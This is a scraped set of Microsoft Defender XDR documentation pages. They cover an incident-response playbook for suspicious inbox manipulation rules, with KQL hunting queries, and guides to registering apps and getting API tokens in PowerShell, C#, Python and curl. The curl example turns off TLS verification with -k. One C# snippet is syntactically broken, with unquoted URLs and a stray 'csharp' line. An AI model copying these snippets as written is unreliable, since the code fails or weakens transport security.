-Here's the workflow to identify suspicious inbox manipulation rule activities.
--
-## Investigation steps
-
-This section contains detailed step-by-step guidance to respond to the incident and take the recommended steps to protect your organization from further attacks.
-
-### 1. Review the alerts
-
-Here's an example of an inbox manipulation rule alert in the alert queue.
--
-Here's an example of the details of an alert that was triggered by a malicious inbox manipulation rule.
--
-### 2. Investigate inbox manipulation rule parameters
-
-Determine if the rules look suspicious according to the following rule parameters or criteria:
--- Keywords-
- The attacker might apply the manipulation rule only to emails that contains certain words. You can find these keywords under certain attributes such as: "BodyContainsWords," "SubjectContainsWords," or "SubjectOrBodyContainsWords."
-
- If there are filtering by keywords, then check whether the keywords seem suspicious to you (common scenarios are to filter emails related to the attacker activities, such as "phish," "spam," and "do not reply," among others).
-
- If there is no filter at all, it might be suspicious as well.
--- Destination folder-
- To evade security detection, the attacker might move the emails to a less noticeable folder and mark the emails as read (for example, "RSS" folder). If the attacker applies "MoveToFolder" and "MarkAsRead" action, check whether the destination folder is somehow related to the keywords in the rule to decide if it seems suspicious or not.
--- Delete all-
- Some attackers will just delete all the incoming emails to hide their activity. Mostly, a rule of "delete all incoming emails" without filtering them with keywords is an indicator of malicious activity.
-
-Here's an example of a "delete all incoming emails" rule configuration (as seen on RawEventData.Parameters) of the relevant event log.
--
-### 3. Investigate the IP address
-
-Review the attributes of the IP address that performed the relevant event of rule creation:
--- Search for other suspicious cloud activities that originated from the same IP in the tenant. For instance, suspicious activity might be multiple failed login attempts.-- Is the ISP common and reasonable for this user?-- Is the location common and reasonable for this user?-
-### 4. Investigate suspicious activity by the user prior to creating the rules
-
-You can review all user activities before rules were created, check for indicators of compromise, and investigate user actions that seem suspicious.
-
-For instance, for multiple failed logins, examine:
--- Login activity-
- Validate that the login activity prior to the rule creation is not suspicious. (common location / ISP / user-agent).
--- Alerts-
- Check whether the user received alerts prior to creating the rules. This could indicate that the user account might be compromised. For example, impossible travel alert, infrequent country/region, multiple failed logins, among others.)
--- Incident-
- Check whether the alert is associated with other alerts that indicate an incident. If so, then check whether the incident contains other true positive alerts.
-
-## Advanced hunting queries
-
-[Advanced Hunting](advanced-hunting-overview.md) is a query-based threat hunting tool that lets you inspect events in your network to locate threat indicators.
-
-Use this query to find all the new inbox rule events during specific time window.
-
-```kusto
-let start_date = now(-10h);
-let end_date = now();
-let user_id = ""; // enter here the user id
-CloudAppEvents
-| where Timestamp between (start_date .. end_date)
-| where AccountObjectId == user_id
-| where Application == @"Microsoft Exchange Online"
-| where ActionType in ("Set-Mailbox", "New-InboxRule", "Set-InboxRule", "UpdateInboxRules") //set new inbox rule related operations
-| project Timestamp, ActionType, CountryCode, City, ISP, IPAddress, RuleConfig = RawEventData.Parameters, RawEventData
-```
-
-The *RuleConfig* column will provide the new inbox rule configuration.
-
-Use this query to check whether the ISP is common for the user by looking at the history of the user.
-
-```kusto
-let alert_date = now(); //enter alert date
-let timeback = 60d;
-let userid = ""; //enter here user id
-CloudAppEvents
-| where Timestamp between ((alert_date-timeback)..(alert_date-1h))
-| where AccountObjectId == userid
-| make-series ActivityCount = count() default = 0 on Timestamp from (alert_date-timeback) to (alert_date-1h) step 12h by ISP
-```
-
-Use this query to check whether the country/region is common for the user by looking at the history of the user.
-
-```kusto
-let alert_date = now(); //enter alert date
-let timeback = 60d;
-let userid = ""; //enter here user id
-CloudAppEvents
-| where Timestamp between ((alert_date-timeback)..(alert_date-1h))
-| where AccountObjectId == userid
-| make-series ActivityCount = count() default = 0 on Timestamp from (alert_date-timeback) to (alert_date-1h) step 12h by CountryCode
-```
-
-Use this query to check whether the user agent is common for the user by looking at the history of the user.
-
-```kusto
-let alert_date = now(); //enter alert date
-let timeback = 60d;
-let userid = ""; //enter here user id
-CloudAppEvents
-| where Timestamp between ((alert_date-timeback)..(alert_date-1h))
-| where AccountObjectId == userid
-| make-series ActivityCount = count() default = 0 on Timestamp from (alert_date-timeback) to (alert_date-1h) step 12h by UserAgent
-```
-
-## Recommended actions
-
-1. Disable the malicious inbox rule.
-2. Reset the user account's credentials. You can also verify if the user account has been compromised with Microsoft Defender for Cloud Apps, which gets security signals from Microsoft Entra ID Protection.
-3. Search for other malicious activities performed by the impacted user account.
-4. Check for other suspicious activity in the tenant that originated from the same IP or from the same ISP (if the ISP is uncommon) to find other compromised user accounts.
-
-## See also
--- [Overview of alert classification](alert-grading-playbooks.md)-- [Suspicious email forwarding activity](alert-grading-playbook-email-forwarding.md)-- [Suspicious inbox forwarding rules](alert-grading-playbook-inbox-forwarding-rules.md)-- [Investigate alerts](investigate-alerts.md)
security Api Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-access.md
- Title: Access the Microsoft Defender XDR APIs
-description: Learn how to access the Microsoft Defender XDR APIs
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/08/2024--
-# Access the Microsoft Defender XDR APIs
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Microsoft Defender XDR exposes much of its data and actions through a set of programmatic APIs. These APIs help you automate workflows and make full use of Microsoft Defender XDR's capabilities.
-
-In general, you'll need to take the following steps to use the APIs:
--- Create a Microsoft Entra application-- Get an access token using this application-- Use the token to access the Microsoft Defender XDR API-
-> [!NOTE]
-> API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-Once you've accomplished these steps, you're ready to access the Microsoft Defender XDR API using a particular context.
-
-## Application context (Recommended)
-
-Use this context for apps that run without a signed-in user present, such as background services or daemons.
-
-1. Create a Microsoft Entra web application.
-2. Assign the desired permissions to the application.
-3. Create a key for the application.
-4. Get a security token using the application and its key.
-5. Use the token to access the Microsoft Defender XDR API.
-
-For more information, see **[Create an app to access Microsoft Defender XDR without a user](api-create-app-web.md)**.
-
-## User context
-
-Use this context to perform actions on behalf of a single user.
-
-1. Create a Microsoft Entra native application.
-2. Assign the desired permission to the application.
-3. Get a security token using the user credentials for the application.
-4. Use the token to access the Microsoft Defender XDR API.
-
-For more information, see **[Create an app to access Microsoft Defender XDR APIs on behalf of a user](api-create-app-user-context.md)**.
-
-## Partner context
-
-Use this context when you need to provide an app to many users across [multiple tenants](/azure/active-directory/develop/single-and-multi-tenant-apps).
-
-1. Create a Microsoft Entra multi-tenant application.
-2. Assign the desired permission to the application.
-3. Get [admin consent](/azure/active-directory/develop/v2-permissions-and-consent#requesting-consent-for-an-entire-tenant) for the app from each tenant.
-4. Get a security token using user credentials based on a customer's tenant ID.
-5. Use the token to access the Microsoft Defender XDR API.
-
-For more information, see **[Create an app with partner access to Microsoft Defender XDR APIs](api-partner-access.md)**.
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Microsoft Defender XDR APIs overview](api-overview.md)-- [OAuth 2.0 authorization for user sign in and API access](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code)-- [Manage secrets in your server apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/)-- [Create a 'Hello world' application that accesses the Microsoft 365 APIs](api-hello-world.md)
security Api Advanced Hunting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-advanced-hunting.md
- Title: Microsoft Defender XDR advanced hunting API
-description: Learn how to run advanced hunting queries using Microsoft Defender XDR's advanced hunting API
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 04/01/2024--
-# Microsoft Defender XDR Advanced hunting API
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!WARNING]
-> This advanced hunting API is an older version with limited capabilities. A more comprehensive version of the advanced hunting API is already available in the **[Microsoft Graph security API](/graph/api/resources/security-api-overview)**. See **[Advanced hunting using Microsoft Graph security API](/graph/api/resources/security-api-overview#advanced-hunting)**
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-[Advanced hunting](advanced-hunting-overview.md) is a threat-hunting tool that uses [specially constructed queries](advanced-hunting-query-language.md) to examine the past 30 days of event data in Microsoft Defender XDR. You can use advanced hunting queries to inspect unusual activity, detect possible threats, and even respond to attacks. The advanced hunting API allows you to programmatically query event data.
-
-## Quotas and resource allocation
-
-The following conditions relate to all queries.
-
-1. Queries explore and return data from the past 30 days.
-2. Results can return up to 100,000 rows.
-3. You can make up to at least 45 calls per minute per tenant. The number of calls varies per tenant based on its size.
-4. Each tenant is allocated CPU resources, based on the tenant size. Queries are blocked if the tenant has reached 100% of the allocated resources until after the next 15-minute cycle. To avoid blocked queries due to excess consumption, follow the guidance in [Optimize your queries to avoid hitting CPU quotas](advanced-hunting-best-practices.md).
-5. If a single request runs for more than three minutes, it times out and returns an error.
-6. A `429` HTTP response code indicates that you've reached the allocated CPU resources, either by number of requests sent, or by allotted running time. Read the response body to understand the limit you have reached.
--
-## Permissions
-
-One of the following permissions is required to call the advanced hunting API. To learn more, including how to choose permissions, see [Access the Microsoft Defender XDR Protection APIs](api-access.md).
-
-Permission type | Permission | Permission display name
--|-|-
-Application | AdvancedHunting.Read.All| Run advanced queries
-Delegated (work or school account) | AdvancedHunting.Read | Run advanced queries
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
->- The user needs to have the 'View Data' role.
->- The user needs to have access to the device, based on device group settings.
-
-## HTTP request
-
-```HTTP
-POST https://api.security.microsoft.com/api/advancedhunting/run
-```
-
-## Request headers
-
-Header | Value
--|-
-Authorization | Bearer {token} **Note: required**
-Content-Type | application/json
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter | Type | Description
--|-|-
-Query | Text | The query to run. **(required)**
-
-## Response
-
-If successful, this method will return `200 OK`, and a _QueryResponse_ object in the response body.
-
-The response object contains three top-level properties:
-
-1. Stats - A dictionary of query performance statistics.
-2. Schema - The schema of the response, a list of Name-Type pairs for each column.
-3. Results - A list of advanced hunting events.
-
-## Example
-
-In the following example, a user sends the query below and receives an API response object containing `Stats`, `Schema`, and `Results`.
-
-### Query
-
-```json
-{
- "Query":"DeviceProcessEvents | where InitiatingProcessFileName =~ \"powershell.exe\" | project Timestamp, FileName, InitiatingProcessFileName | order by Timestamp desc | limit 2"
-}
-
-```
-
-### Response object
-
-```json
-{
- "Stats": {
- "ExecutionTime": 4.621215,
- "resource_usage": {
- "cache": {
- "memory": {
- "hits": 773461,
- "misses": 4481,
- "total": 777942
- },
- "disk": {
- "hits": 994,
- "misses": 197,
- "total": 1191
- }
- },
- "cpu": {
- "user": "00:00:19.0468750",
- "kernel": "00:00:00.0156250",
- "total cpu": "00:00:19.0625000"
- },
- "memory": {
- "peak_per_node": 236822432
- }
- },
- "dataset_statistics": [
- {
- "table_row_count": 2,
- "table_size": 102
- }
- ]
- },
- "Schema": [
- {
- "Name": "Timestamp",
- "Type": "DateTime"
- },
- {
- "Name": "FileName",
- "Type": "String"
- },
- {
- "Name": "InitiatingProcessFileName",
- "Type": "String"
- }
- ],
- "Results": [
- {
- "Timestamp": "2020-08-30T06:38:35.7664356Z",
- "FileName": "conhost.exe",
- "InitiatingProcessFileName": "powershell.exe"
- },
- {
- "Timestamp": "2020-08-30T06:38:30.5163363Z",
- "FileName": "conhost.exe",
- "InitiatingProcessFileName": "powershell.exe"
- }
- ]
-}
-```
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Learn about API limits and licensing](api-terms.md)-- [Understand error codes](api-error-codes.md)-- [Advanced hunting overview](advanced-hunting-overview.md)
security Api Articles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-articles.md
- Title: Other security and threat protection APIs
-description: View a list of APIs related to Microsoft security and threat protection products.
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/08/2024--
-# Other security and threat protection APIs
--
-**Applies to:**
--- Microsoft Defender XDR API-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-The following resources provide more information about APIs available for other Microsoft security solutions, beyond the Microsoft Defender XDR API.
--- [Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/apis-intro)-- [Microsoft Defender for Office 365](/office/office-365-management-api/)-- [Microsoft Defender for Cloud Apps](/cloud-app-security/api-introduction)
security Api Create App User Context https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-create-app-user-context.md
- Title: Create an app to access Microsoft Defender XDR APIs on behalf of a user
-description: Learn how to access Microsoft Defender XDR APIs on behalf of a user.
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/16/2024--
-# Create an app to access Microsoft Defender XDR APIs on behalf of a user
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-This page describes how to create an application to get programmatic access to Microsoft Defender XDR on behalf of a single user.
-
-If you need programmatic access to Microsoft Defender XDR without a defined user (for example, if you're writing a background app or daemon), see [Create an app to access Microsoft Defender XDR without a user](api-create-app-web.md). If you need to provide access for multiple tenantsΓÇöfor example, if you're serving a large organization or a group of customersΓÇösee [Create an app with partner access to Microsoft Defender XDR APIs](api-partner-access.md).If you're not sure which kind of access you need, see [Get started](api-access.md).
-
-Microsoft Defender XDR exposes much of its data and actions through a set of programmatic APIs. Those APIs help you automate workflows and make use of Microsoft Defender XDR's capabilities. This API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-In general, you'll need to take the following steps to use these APIs:
--- Create a Microsoft Entra application.-- Get an access token using this application.-- Use the token to access Microsoft Defender XDR API.-
-This article explains how to:
--- Create a Microsoft Entra application-- Get an access token to Microsoft Defender XDR-- Validate the token-
-> [!NOTE]
-> When accessing Microsoft Defender XDR API on behalf of a user, you will need the correct application permissions and user permissions.
-
-> [!TIP]
-> If you have the permission to perform an action in the portal, you have the permission to perform the action in the API.
-
-## Create an app
-
-1. Sign in to [Azure](https://portal.azure.com) as a user with the **Global Administrator** role.
-
-2. Navigate to **Microsoft Entra ID** > **App registrations** > **New registration**.
-
- :::image type="content" source="../../media/atp-azure-new-app2.png" alt-text="The New registration option in the Manage pane in the Azure portal" lightbox="../../media/atp-azure-new-app2.png":::
-
-3. In the form, choose a name for your application and enter the following information for the redirect URI, then select **Register**.
-
- :::image type="content" source="../../media/nativeapp-create2.PNG" alt-text="The application registration pane in the Azure portal" lightbox="../../media/nativeapp-create2.PNG":::
-
-
- - **Application type:** Public client
- - **Redirect URI:** https://portal.azure.com
-
-4. On your application page, select **API Permissions** > **Add permission** > **APIs my organization uses** >, type **Microsoft Threat Protection**, and select **Microsoft Threat Protection**. Your app can now access Microsoft Defender XDR.
-
- > [!TIP]
- > *Microsoft Threat Protection* is a former name for Microsoft Defender XDR, and will not appear in the original list. You need to start writing its name in the text box to see it appear.
-
- :::image type="content" source="../../media/apis-in-my-org-tab.PNG" alt-text="Your organization's APIs pane in the Microsoft Defender portal" lightbox="../../media/apis-in-my-org-tab.PNG":::
-
- - Choose **Delegated permissions**. Choose the relevant permissions for your scenario (for example **Incident.Read**), and then select **Add permissions**.
-
- :::image type="content" source="../../media/request-api-permissions-delegated.PNG" alt-text="The Delegated permissions pane in the Microsoft Defender portal" lightbox="../../media/request-api-permissions-delegated.PNG":::
-
- > [!NOTE]
- > You need to select the relevant permissions for your scenario. *Read all incidents* is just an example. To determine which permission you need, please look at the **Permissions** section in the API you want to call.
- >
- > For instance, to [run advanced queries](api-advanced-hunting.md), select the 'Run advanced queries' permission; to [isolate a device](/windows/security/threat-protection/microsoft-defender-atp/isolate-machine), select the 'Isolate machine' permission.
-
-5. Select **Grant admin consent**. Every time you add a permission, you must select **Grant admin consent** for it to take effect.
-
- :::image type="content" source="../../media/grant-consent-delegated.PNG" alt-text="The admin consent-granting pane in the Microsoft Defender portal" lightbox="../../media/grant-consent-delegated.PNG":::
-
-6. Record your application ID and your tenant ID somewhere safe. They're listed under **Overview** on your application page.
-
- :::image type="content" source="../../media/app-and-tenant-ids.png" alt-text="The Overview pane in the Microsoft Defender portal" lightbox="../../media/app-and-tenant-ids.png":::
-
-## Get an access token
-
-For more information on Microsoft Entra tokens, see the [Microsoft Entra tutorial](/azure/active-directory/develop/active-directory-v2-protocols-oauth-client-creds).
-
-### Get an access token on behalf of a user using PowerShell
-
-Use the MSAL.PS library to acquire access tokens with Delegated permissions. Run the following commands to get access token on behalf of a user:
-
-```PowerShell
-Install-Module -Name MSAL.PS # Install the MSAL.PS module from PowerShell Gallery
-
-$TenantId = " " # Paste your directory (tenant) ID here.
-$AppClientId="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" # Paste your application (client) ID here.
-
-$MsalParams = @{
- ClientId = $AppClientId
- TenantId = $TenantId
- Scopes = 'https://graph.microsoft.com/User.Read.All','https://graph.microsoft.com/Files.ReadWrite','https://api.securitycenter.windows.com/AdvancedQuery.Read'
-}
-
-$MsalResponse = Get-MsalToken @MsalParams
-$AccessToken = $MsalResponse.AccessToken
-
-$AccessToken # Display the token in PS console
-```
-## Validate the token
-
-1. Copy and paste the token into [JWT](https://jwt.ms) to decode it.
-2. Make sure that the *roles* claim within the decoded token contains the desired permissions.
-
-In the following image, you can see a decoded token acquired from an app, with ```Incidents.Read.All```, ```Incidents.ReadWrite.All```, and ```AdvancedHunting.Read.All``` permissions:
--
-<a name='use-the-token-to-access-the-microsoft-365-defender-api'></a>
-
-## Use the token to access the Microsoft Defender XDR API
-
-1. Choose the API you want to use (incidents, or advanced hunting). For more information, see [Supported Microsoft Defender XDR APIs](api-supported.md).
-2. In the http request you're about to send, set the authorization header to `"Bearer" <token>`, *Bearer* being the authorization scheme, and *token* being your validated token.
-3. The token will expire within one hour. You can send more than one request during this time with the same token.
-
-The following example shows how to send a request to get a list of incidents **using C#**.
-
-```C#
- var httpClient = new HttpClient();
- var request = new HttpRequestMessage(HttpMethod.Get, "https://api.security.microsoft.com/api/incidents");
-
- request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
-
- var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
-```
-
-## Related articles
--- [Microsoft Defender XDR APIs overview](api-overview.md)-- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Create a 'Hello world' app](api-hello-world.md)-- [Create an app to access Microsoft Defender XDR without a user](api-create-app-web.md)-- [Create an app with multi-tenant partner access to Microsoft Defender XDR APIs](api-partner-access.md)-- [Learn about API limits and licensing](api-terms.md)-- [Understand error codes](api-error-codes.md)-- [OAuth 2.0 authorization for user sign in and API access](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code)
security Api Create App Web https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-create-app-web.md
- Title: Create an app to access Microsoft Defender XDR without a user
-description: Learn how to create an app to access Microsoft Defender XDR without a user.
-
- - NOCSH
-----
- - MOE150
- - MET150
- Previously updated : 02/16/2024--
-# Create an app to access Microsoft Defender XDR without a user
--
-**Applies to:**
--- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-This page describes how to create an application to get programmatic access to Microsoft Defender XDR without a defined userΓÇöfor example, if you're creating a daemon or background service.
-
-If you need programmatic access to Microsoft Defender XDR on behalf of one or more users, see [Create an app to access Microsoft Defender XDR APIs on behalf of a user](api-create-app-user-context.md) and [Create an app with partner access to Microsoft Defender XDR APIs](api-partner-access.md). If you're not sure which kind of access you need, see [Get started](api-access.md).
-
-Microsoft Defender XDR exposes much of its data and actions through a set of programmatic APIs. Those APIs help you automate workflows and make use of Microsoft Defender XDR's capabilities. This API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-In general, you'll need to take the following steps to use these APIs:
--- Create a Microsoft Entra application.-- Get an access token using this application.-- Use the token to access Microsoft Defender XDR API.-
-This article explains how to:
--- Create a Microsoft Entra application-- Get an access token to Microsoft Defender XDR-- Validate the token.-
-## Create an app
-
-1. Sign in to [Azure](https://portal.azure.com) as a user with the **Global Administrator** role.
-
-2. Navigate to **Microsoft Entra ID** > **App registrations** > **New registration**.
-
- :::image type="content" source="../../media/atp-azure-new-app2.png" alt-text="The New registration tab in the Microsoft Defender portal" lightbox="../../media/atp-azure-new-app2.png":::
-
-3. In the form, choose a name for your application, then select **Register**.
-
-4. On your application page, select **API Permissions** > **Add permission** > **APIs my organization uses** >, type **Microsoft Threat Protection**, and select **Microsoft Threat Protection**. Your app can now access Microsoft Defender XDR.
-
- > [!TIP]
- > *Microsoft Threat Protection* is a former name for Microsoft Defender XDR, and will not appear in the original list. You need to start writing its name in the text box to see it appear.
-
- :::image type="content" source="../../media/apis-in-my-org-tab.PNG" alt-text="The organization's APIs usage tab in the Microsoft Defender portal" lightbox="../../media/apis-in-my-org-tab.PNG":::
-
-5. Select **Application permissions**. Choose the relevant permissions for your scenario (for example, **Incident.Read.All**), and then select **Add permissions**.
-
- :::image type="content" source="../../media/request-api-permissions.PNG" alt-text="The application permission pane in the Microsoft Defender portal" lightbox="../../media/request-api-permissions.PNG":::
-
- > [!NOTE]
- > You need to select the relevant permissions for your scenario. *Read all incidents* is just an example. To determine which permission you need, please look at the **Permissions** section in the API you want to call.
- >
- > For instance, to [run advanced queries](api-advanced-hunting.md), select the 'Run advanced queries' permission; to [isolate a device](/windows/security/threat-protection/microsoft-defender-atp/isolate-machine), select the 'Isolate machine' permission.
-
-6. Select **Grant admin consent**. Every time you add a permission, you must select **Grant admin consent** for it to take effect.
-
- :::image type="content" source="../../media/grant-consent.PNG" alt-text="The consent grant-related pane in the Microsoft Defender portal" lightbox="../../media/grant-consent.PNG":::
-
-7. To add a secret to the application, select **Certificates & secrets**, add a description to the secret, then select **Add**.
-
- > [!TIP]
- > After you select **Add**, select **copy the generated secret value**. You won't be able to retrieve the secret value after you leave.
-
- :::image type="content" source="../../media/defender-endpoint/webapp-create-key2.png" alt-text="The create app pane in the Microsoft Defender portal" lightbox="../../media/defender-endpoint/webapp-create-key2.png":::
-
-8. Record your application ID and your tenant ID somewhere safe. They're listed under **Overview** on your application page.
-
- :::image type="content" source="../../media/app-and-tenant-ids.png" alt-text="The Overview pane in the Microsoft Defender portal" lightbox="../../media/app-and-tenant-ids.png":::
-
-9. **For Microsoft Defender XDR Partners only**: [Follow these instructions](./api-partner-access.md) for partner access through the Microsoft Defender XDR APIs, set your app to be multi-tenant, so it can be available in all tenants once you receive admin consent. Partner access is **required** for third-party appsΓÇöfor example, if you create an app that is intended to run in multiple customers' tenants. It is **not required** if you create a service that you want to run in your tenant only, such as an application for your own usage that will only interact with your own data. To set your app to be multi-tenant:
-
- - Go to **Authentication**, and add https://portal.azure.com as the **Redirect URI**.
-
- - On the bottom of the page, under **Supported account types**, select the **Accounts in any organizational directory** application consent for your multi-tenant app.
-
- Since your application interacts with Microsoft Defender XDR on behalf of your users, it needs be approved for every tenant on which you intend to use it.
-
- The Active Directory global admin for each tenant needs to select the consent link and approve your app.
-
- The consent link has the following structure:
-
- ```http
- https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=<00000000-0000-0000-0000-000000000000>&response_type=code&sso_reload=true
- ```
-
- The digits `00000000-0000-0000-0000-000000000000` should be replaced with your Application ID.
-
-**Done!** You've successfully registered an application! See examples below for token acquisition and validation.
-
-## Get an access token
-
-For more information on Microsoft Entra tokens, see the [Microsoft Entra tutorial](/azure/active-directory/develop/active-directory-v2-protocols-oauth-client-creds).
-
-> [!IMPORTANT]
-> Although the examples in this section encourage you to paste in secret values for testing purposes, you should **never hardcode secrets** into an application running in production. A third party could use your secret to access resources. You can help keep your app's secrets secure by using [Azure Key Vault](/azure/key-vault/general/about-keys-secrets-certificates). For a practical example of how you can protect your app, see [Manage secrets in your server apps with Azure Key Vault](/training/modules/manage-secrets-with-azure-key-vault/).
-
-### Get an access token using PowerShell
-
-```PowerShell
-# This code gets the application context token and saves it to a file named "Latest-token.txt" under the current directory.
-
-$tenantId = '' # Paste your directory (tenant) ID here
-$clientId = '' # Paste your application (client) ID here
-$appSecret = '' # Paste your own app secret here to test, then store it in a safe place, such as the Azure Key Vault!
-
-$resourceAppIdUri = 'https://api.security.microsoft.com'
-$oAuthUri = "https://login.windows.net/$tenantId/oauth2/token"
-
-$authBody = [Ordered] @{
- resource = $resourceAppIdUri
- client_id = $clientId
- client_secret = $appSecret
- grant_type = 'client_credentials'
-}
-
-$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
-$token = $authResponse.access_token
-
-Out-File -FilePath "./Latest-token.txt" -InputObject $token
-
-return $token
-```
-
-### Get an access token using C\#
-
-> [!NOTE]
-> The following code was tested with Nuget Microsoft.Identity.Client 3.19.8.
-
-> [!IMPORTANT]
-> The [Microsoft.IdentityModel.Clients.ActiveDirectory](https://www.nuget.org/packages/Microsoft.IdentityModel.Clients.ActiveDirectory) NuGet package and Azure AD Authentication Library (ADAL) have been deprecated. No new features have been added since June 30, 2020. We strongly encourage you to upgrade, see the [migration guide](/azure/active-directory/develop/msal-migration) for more details.
-
-1. Create a new console application.
-
-1. Install NuGet [Microsoft.Identity.Client](https://www.nuget.org/packages/Microsoft.Identity.Client/).
-
-1. Add the following line:
-
- ```C#
- using Microsoft.Identity.Client;
- ```
-
-1. Copy and paste the following code into your app (don't forget to update the three variables: `tenantId`, `clientId`, `appSecret`):
-
- ```C#
- csharp
- string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here
- string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
- string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a test, and then store it in a safe place!
- const string authority = https://login.microsoftonline.com;
- const string audience = https://api.securitycenter.microsoft.com;
-
- IConfidentialClientApplication myApp = ConfidentialClientApplicationBuilder.Create(appId).WithClientSecret(appSecret).WithAuthority($"{authority}/{tenantId}").Build();
-
- List<string> scopes = new List<string>() { $"{audience}/.default" };
-
- AuthenticationResult authResult = myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResult();
-
- string token = authResult.AccessToken;
- ```
-
-### Get an access token using Python
-
-```Python
-import json
-import urllib.request
-import urllib.parse
-
-tenantId = '' # Paste your directory (tenant) ID here
-clientId = '' # Paste your application (client) ID here
-appSecret = '' # Paste your own app secret here to test, then store it in a safe place, such as the Azure Key Vault!
-
-url = "https://login.windows.net/%s/oauth2/token" % (tenantId)
-
-resourceAppIdUri = 'https://api.security.microsoft.com'
-
-body = {
- 'resource' : resourceAppIdUri,
- 'client_id' : clientId,
- 'client_secret' : appSecret,
- 'grant_type' : 'client_credentials'
-}
-
-data = urllib.parse.urlencode(body).encode("utf-8")
-
-req = urllib.request.Request(url, data)
-response = urllib.request.urlopen(req)
-jsonResponse = json.loads(response.read())
-aadToken = jsonResponse["access_token"]
-```
-
-### Get an access token using curl
-
-> [!NOTE]
-> Curl is pre-installed on Windows 10, versions 1803 and later. For other versions of Windows, download and install the tool directly from the [official curl website](https://curl.haxx.se/windows/).
-
-1. Open a command prompt, and set CLIENT_ID to your Azure application ID.
-
-1. Set CLIENT_SECRET to your Azure application secret.
-
-1. Set TENANT_ID to the Azure tenant ID of the customer that wants to use your app to access Microsoft Defender XDR.
-
-1. Run the following command:
-
- ```bash
- curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d "scope=https://api.security.microsoft.com/.default" -d "client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k
- ```
-
- A successful response will look like this:
-
- ```bash
- {"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}
- ```
-
-## Validate the token
-
-1. Copy and paste the token into the [JSON web token validator website, JWT,](https://jwt.ms) to decode it.
-
-1. Make sure that the *roles* claim within the decoded token contains the desired permissions.
-
- In the following image, you can see a decoded token acquired from an app, with `Incidents.Read.All`, `Incidents.ReadWrite.All`, and `AdvancedHunting.Read.All` permissions:
-
- :::image type="content" source="../../media/defender-endpoint/webapp-decoded-token.png" alt-text="The Decoded token pane in the Microsoft Defender portal" lightbox="../../media/defender-endpoint/webapp-decoded-token.png":::
-
-<a name='use-the-token-to-access-the-microsoft-365-defender-api'></a>
-
-## Use the token to access the Microsoft Defender XDR API
-
-1. Choose the API you want to use (incidents, or advanced hunting). For more information, see [Supported Microsoft Defender XDR APIs](api-supported.md).
-
-2. In the http request you are about to send, set the authorization header to `"Bearer" <token>`, *Bearer* being the authorization scheme, and *token* being your validated token.
-
-3. The token will expire within one hour. You can send more than one request during this time with the same token.
-
-The following example shows how to send a request to get a list of incidents **using C#**.
-
-```C#
